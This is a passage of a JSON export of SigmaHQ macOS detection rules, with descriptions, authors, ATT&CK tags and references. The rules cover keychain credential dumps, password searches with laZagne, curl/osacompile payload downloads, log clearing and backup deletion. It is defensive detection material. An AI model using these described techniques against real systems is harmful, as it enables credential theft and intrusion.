"dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "69483748-1525-4a6c-95ca-90dc8d431b68", "value": "Suspicious Microsoft Office Child Process - MacOS" }, { "description": "Detects attempts to enable the guest account using the sysadminctl utility", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-02-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_sysadminctl_enable_guest_account.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://ss64.com/osx/sysadminctl.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml" ], "tags": [ "attack.initial-access", "attack.t1078", "attack.t1078.001" ] }, "related": 
[ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "6151cbea-819b-455a-9fa6-99a1cc58797d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d7329412-13bd-44ba-a072-3387f804a106", "value": "Guest Account Enabled Via Sysadminctl" }, { "description": "Detects the enumeration of other remote systems.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-22", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_remote_system_discovery.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1018" ] }, "related": [ { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "10227522-8429-47e6-a301-f2b2d014e7ad", "value": "Macos Remote System Discovery" }, { "description": "Detects execution of AppleScript of the macOS scripting language AppleScript.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-21", "falsepositive": [ "Application installers might contain scripts as part of the installation process." 
], "filename": "proc_creation_macos_applescript.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md", "https://redcanary.com/blog/applescript/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_applescript.yml" ], "tags": [ "attack.execution", "attack.t1059.002" ] }, "related": [ { "dest-uuid": "37b11151-1776-4f8f-b328-30939fbf2ceb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1bc2e6c5-0885-472b-bed6-be5ea8eace55", "value": "MacOS Scripting Interpreter AppleScript" }, { "description": "Detects potential suspicious applet or osascript executing \"osacompile\".", "meta": { "author": "Sohan G (D4rkCiph3r), Red Canary (Idea)", "creation_date": "2023-04-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_suspicious_applet_behaviour.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://redcanary.com/blog/mac-application-bundles/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_suspicious_applet_behaviour.yml" ], "tags": [ "attack.execution", "attack.t1059.002" ] }, "related": [ { "dest-uuid": "37b11151-1776-4f8f-b328-30939fbf2ceb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a753a6af-3126-426d-8bd0-26ebbcb92254", "value": "Osacompile Execution By Potentially Suspicious Applet/Osascript" }, { "description": "Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. 
This technique is used in post-exploitation scenarios.\n", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2024-01-02", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_csrutil_status.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://ss64.com/osx/csrutil.html", "https://objective-see.org/blog/blog_0x6D.html", "https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior", "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml" ], "tags": [ "attack.discovery", "attack.t1518.001" ] }, "related": [ { "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53821412-17b0-4147-ade0-14faae67d54b", "value": "System Integrity Protection (SIP) Enumeration" }, { "description": "Detects enumeration of local system accounts on MacOS", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_local_account.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_account.yml" ], "tags": [ "attack.discovery", "attack.t1087.001" ] }, "related": [ { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ddf36b67-e872-4507-ab2e-46bda21b842c", "value": "Local 
System Accounts Discovery - MacOs" }, { "description": "Detects when the macOS Script Editor utility spawns an unusual child process.", "meta": { "author": "Tim Rauch (rule), Elastic (idea)", "creation_date": "2022-10-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_susp_execution_macos_script_editor.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685", "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml" ], "tags": [ "attack.t1566", "attack.t1566.002", "attack.initial-access", "attack.t1059", "attack.t1059.002", "attack.t1204", "attack.t1204.001", "attack.execution", "attack.persistence", "attack.t1553", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2b742742-28c3-4e1b-bab7-8350d6300fa7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "37b11151-1776-4f8f-b328-30939fbf2ceb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" }, { "dest-uuid": "b83e166d-13d7-4b52-8677-dff90c548fd7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4", "value": "Suspicious Execution via macOS Script Editor" }, { "description": "Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.", "meta": { "author": "Tim Rauch (rule), Elastic (idea)", "creation_date": "2022-10-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_payload_decoded_and_decrypted.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml" ], "tags": [ "attack.t1059", "attack.t1204", "attack.execution", "attack.t1140", "attack.defense-evasion", "attack.s0482", "attack.s0402" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "234dc5df-40b5-49d1-bf53-0d44ce778eca", "value": "Payload Decoded and Decrypted via Built-in 
Utilities" }, { "description": "Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-02-18", "falsepositive": [ "Legitimate software uses the scripts (preinstall, postinstall)" ], "filename": "proc_creation_macos_installer_susp_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://redcanary.com/blog/clipping-silver-sparrows-wings/", "https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_installer_package_spawned_network_event.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_installer_susp_child_process.yml" ], "tags": [ "attack.t1059", "attack.t1059.007", "attack.t1071", "attack.t1071.001", "attack.execution", "attack.command-and-control" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e0cfaecd-602d-41af-988d-f6ccebb2af26", "value": "Suspicious Installer Package Child Process" }, { "description": "Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. 
The detected execution is a bash one-liner.\n", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-12-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_tail_base64_decode_from_image.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://www.virustotal.com/gui/file/483fafc64a2b84197e1ef6a3f51e443f84dc5742602e08b9e8ec6ad690b34ed0/behavior", "https://www.virustotal.com/gui/file/16bafdf741e7a13137c489f3c8db1334f171c7cb13b62617d691b0a64783cc48/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_tail_base64_decode_from_image.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "09a910bf-f71f-4737-9c40-88880ba5913d", "value": "Potential Base64 Decoded From Images" }, { "description": "Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware", "meta": { "author": "Sohan G (D4rkCiph3r), Red Canary (idea)", "creation_date": "2023-08-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_susp_in_memory_download_and_compile.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://redcanary.com/blog/mac-application-bundles/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_in_memory_download_and_compile.yml" ], "tags": [ "attack.command-and-control", "attack.execution", "attack.t1059.007", "attack.t1105" ] }, "related": [ { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "13db8d2e-7723-4c2c-93c1-a4d36994f7ef", "value": "Potential In-Memory Download And Compile Of Payloads" }, { "description": "Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.", "meta": { "author": "Tim Rauch (rule), Elastic (idea)", "creation_date": "2022-10-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_xcsset_malware_infection.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml" ], "tags": [ "attack.command-and-control" ] }, "uuid": "47d65ac0-c06f-4ba2-a2e3-d263139d0f51", "value": "Potential XCSSET Malware Infection" }, { "description": "Detecting attempts to extract passwords with grep and laZagne", "meta": { "author": "Igor Fits, Mikhail Larin, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_find_cred_in_files.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml" ], "tags": [ "attack.credential-access", "attack.t1552.001" ] }, "related": [ { "dest-uuid": 
"837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53b1b378-9b06-4992-b972-dde6e423d2b4", "value": "Credentials In Files" }, { "description": "Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-04-05", "falsepositive": [ "Legitimate browser install, update and recovery scripts" ], "filename": "proc_creation_macos_susp_browser_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_initial_access_suspicious_browser_childproc.toml", "https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_browser_child_process.yml" ], "tags": [ "attack.initial-access", "attack.execution", "attack.t1189", "attack.t1203", "attack.t1059" ] }, "related": [ { "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0250638a-2b28-4541-86fc-ea4c558fa0c6", "value": "Suspicious Browser Child Process - MacOS" }, { "description": "Detects the execution of the nscurl utility in order to download files.", "meta": { "author": "Daniel Cortez", "creation_date": "2024-06-04", "falsepositive": [ "Legitimate usage of nscurl by 
administrators and users." ], "filename": "proc_creation_macos_nscurl_usage.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl", "https://www.loobins.io/binaries/nscurl/", "https://gist.github.com/nasbench/ca6ef95db04ae04ffd1e0b1ce709cadd", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_nscurl_usage.yml" ], "tags": [ "attack.defense-evasion", "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6d8a7cf1-8085-423b-b87d-7e880faabbdf", "value": "File Download Via Nscurl - MacOS" }, { "description": "Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-10", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_create_hidden_account.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.002" ] }, "related": [ { "dest-uuid": "8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b22a5b36-2431-493a-8be1-0bae56c28ef3", "value": "Hidden User Creation" }, { "description": "Detects the creation of a new user account. 
Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_create_account.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", "https://ss64.com/osx/sysadminctl.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" ], "tags": [ "attack.t1136.001", "attack.persistence" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "51719bf5-e4fd-4e44-8ba8-b830e7ac0731", "value": "Creation Of A Local User Account" }, { "description": "Detects passwords dumps from Keychain", "meta": { "author": "Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems)", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_creds_from_keychain.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md", "https://gist.github.com/Capybara/6228955", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" ], "tags": [ "attack.credential-access", "attack.t1555.001" ] }, "related": [ { "dest-uuid": "1eaebf46-e361-4437-bc23-d5d65a3b92e3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"b120b587-a4c2-4b94-875d-99c9807d6955", "value": "Credentials from Password Stores - Keychain" }, { "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_macos_base64_decode.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_base64_decode.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "719c22d7-c11a-4f2c-93a6-2cfdd5412f68", "value": "Decode Base64 Encoded Text -MacOs" }, { "description": "Detects the execution of \"system_profiler\" with specific \"Data Types\" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information.\nThis process is primarily used for system information discovery. 
However, \"system_profiler\" can also be used to determine if virtualization software is being run for defense evasion purposes.\n", "meta": { "author": "Stephen Lincoln `@slincoln_aiq` (AttackIQ)", "creation_date": "2024-01-02", "falsepositive": [ "Legitimate administrative activities" ], "filename": "proc_creation_macos_system_profiler_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af", "https://objective-see.org/blog/blog_0x62.html", "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", "https://www.trendmicro.com/en_za/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", "https://ss64.com/mac/system_profiler.html", "https://www.sentinelone.com/wp-content/uploads/pdf-gen/1630910064/20-common-tools-techniques-used-by-macos-threat-actors-malware.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml" ], "tags": [ "attack.discovery", "attack.defense-evasion", "attack.t1082", "attack.t1497.001" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "29be378d-262d-4e99-b00d-852d573628e6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4809c683-059b-4935-879d-36835986f8cf", "value": "System Information Discovery Using System_Profiler" }, { "description": "Detects usage of system utilities to discover system network connections", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_macos_system_network_connections_discovery.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": 
"macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1049" ] }, "related": [ { "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9a7a0393-2144-4626-9bf1-7c2f5a7321db", "value": "System Network Connections Discovery - MacOs" }, { "description": "Detects the execution of the \"chflags\" utility with the \"hidden\" flag, in order to hide files on MacOS.\nWhen a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.\n", "meta": { "author": "Omar Khaled (@beacon_exe)", "creation_date": "2024-08-21", "falsepositive": [ "Legitimate usage of chflags by administrators and users." 
], "filename": "proc_creation_macos_chflags_hidden_flag.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", "https://www.sentinelone.com/labs/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/", "https://ss64.com/mac/chflags.html", "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_chflags_hidden_flag.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.t1564.004", "attack.t1552.001", "attack.t1105" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3b2c1059-ae5f-40b6-b5d4-6106d3ac20fe", "value": "Hidden Flag Set On File/Directory Via Chflags - MacOS" }, { "description": "Detects deletion of local audit logs", "meta": { "author": "remotephone, oscd.community", "creation_date": "2020-10-11", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_clear_system_logs.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.002" ] }, "related": [ { "dest-uuid": "2bce5b30-7014-4a5d-ade7-12913fe6ac36", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "acf61bd8-d814-4272-81f0-a7a269aa69aa", "value": "Indicator Removal on Host - Clear Mac System Logs" }, { "description": "Detects deletion attempts of MacOS Time Machine backups via the native backup utility \"tmutil\".\nAn adversary may perform this action before launching a ransomware attack to prevent the victim from restoring their files.\n", "meta": { "author": "Pratinav Chandra", "creation_date": "2024-05-29", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_macos_tmutil_delete_backup.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine", "https://www.loobins.io/binaries/tmutil/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "452df256-da78-427a-866f-49fa04417d74", "value": "Time Machine Backup Deletion Attempt Via Tmutil - MacOS" }, { "description": "Detects possible collection of data from the clipboard via execution of the osascript binary", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-01-31", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_macos_clipboard_data_via_osascript.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "macos", "refs": 
[ "https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_clipboard_data_via_osascript.yml" ], "tags": [ "attack.collection", "attack.execution", "attack.t1115", "attack.t1059.002" ] }, "related": [ { "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "37b11151-1776-4f8f-b328-30939fbf2ceb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7794fa3c-edea-4cff-bec7-267dd4770fd7", "value": "Clipboard Data Collection Via OSAScript" }, { "description": "Detects usage of system utilities (only grep for now) to discover security software", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_macos_security_software_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1518.001" ] }, "related": [ { "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0ed75b9c-c73b-424d-9e7d-496cd565fbe0", "value": "Security Software Discovery - MacOs" }, { "description": "Detects commandline operations on shell history files", "meta": { "author": "Mikhail Larin, oscd.community", "creation_date": "2020-10-17", "falsepositive": [ "Legitimate administrative activity", "Legitimate software, cleaning hist 
